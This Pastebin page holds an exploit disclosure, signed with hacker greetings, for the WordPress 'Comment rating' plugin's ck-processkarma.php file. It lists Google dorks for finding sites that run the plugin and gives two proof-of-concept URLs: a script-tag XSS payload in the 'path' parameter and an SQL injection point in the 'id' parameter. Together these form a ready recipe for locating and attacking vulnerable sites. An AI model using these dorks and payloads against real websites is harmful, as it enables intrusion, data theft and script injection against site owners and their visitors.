Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities
- # Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"
- # 2- inurl:"/ck-processkarma.php?id="
- # Date: 2/1/2012
- # Author: The Evil Thinker
- # Contact : Enstene156@hotmail.fr
- # Software Link: www.wordpress.com
- # Vulnerable plugin: Comment rating plugin
- # Tested on: Linux
- Details :
- ---------
- the vulnerable file is "ck-processkarma.php"
- the script doesn't filter the input parameters (id "sql", path "XSS")
- Poc 1 (XSS) :
- http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=
- Poc 2 (SQL injection) :
- http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=
- -------------------------------------------------------------------------------------------
- Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement